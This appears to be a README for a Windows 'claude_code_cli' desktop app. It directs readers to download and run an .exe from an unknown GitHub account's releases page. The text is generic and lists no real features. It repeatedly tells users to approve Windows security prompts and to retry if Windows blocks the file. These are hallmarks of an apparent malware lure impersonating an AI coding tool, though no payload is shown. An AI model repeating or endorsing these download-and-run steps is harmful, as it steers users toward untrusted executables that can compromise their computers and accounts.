claude_code_cli is a simple desktop app for Windows that helps you work with Claude code from one place. It is built for end users who want to download the app, open it, and start using it without setup work.
Use it to:
- Open Claude code tools from your Windows PC
- Keep your work in one app
- Run tasks with a simple command line style interface
- Manage code-related actions without extra steps
Visit this page to download the Windows release:
https://github.com/Isometrical-selection572/claude_code_cli/releases
On that page, find the latest release and download the file that matches Windows. In most cases, this is an .exe file or a .zip file that contains the app.
Use a Windows PC with:
- Windows 10 or Windows 11
- At least 4 GB of RAM
- Enough free disk space for the app and its files
- An active internet connection for the first download
For best results, close extra apps before you start.
Follow these steps to run claude_code_cli on Windows:
- Open the download page.
- Find the latest release at the top of the page.
- Download the Windows file.
- If the file is in a
.zipfolder, right-click it and choose Extract All. - Open the extracted folder.
- Double-click the
.exefile to start the app. - If Windows asks for permission, choose Run or Yes.
- Wait for the app to open.
Some releases come as a ZIP file. If so:
- Save the ZIP file to your Downloads folder.
- Right-click the ZIP file.
- Select Extract All.
- Choose a folder you can find easily, such as Desktop.
- Open the new folder.
- Start the app by double-clicking the main
.exefile.
If you move the files later, keep the whole folder together so the app can still run.
When the app opens for the first time, you may see a small setup screen or command window. This is normal. Follow any on-screen steps shown by the app.
If the app asks for a file path, choose a folder where you want to keep your work. A folder on your Desktop or in Documents works well.
Windows may show a security prompt when you open the app for the first time. This is common for downloaded apps.
If you trust the source and want to continue:
- Select Run
- Or select Yes
- Then wait for the app to open
If Windows blocks the app, check that you downloaded it from the release page above and try again.
To keep things simple, use a folder like this:
Documents\claude_code_cli- or
Desktop\claude_code_cli
This helps you find your files later and keeps the app easy to manage.
After the app starts, you can begin using it for Claude code tasks. The app is made to support a simple workflow:
- Open the app
- Load your work folder
- Run the command or action you need
- Review the output
- Save your changes
If you are new to this kind of app, start with one task at a time.
You may see these files in the download:
.exe— the app file you open.zip— a compressed folder you extract first.txt— plain text instructions or notes.json— settings or data files.log— app logs that help track what happened
Do not delete files unless you know what they do. Keep the app files in the same folder.
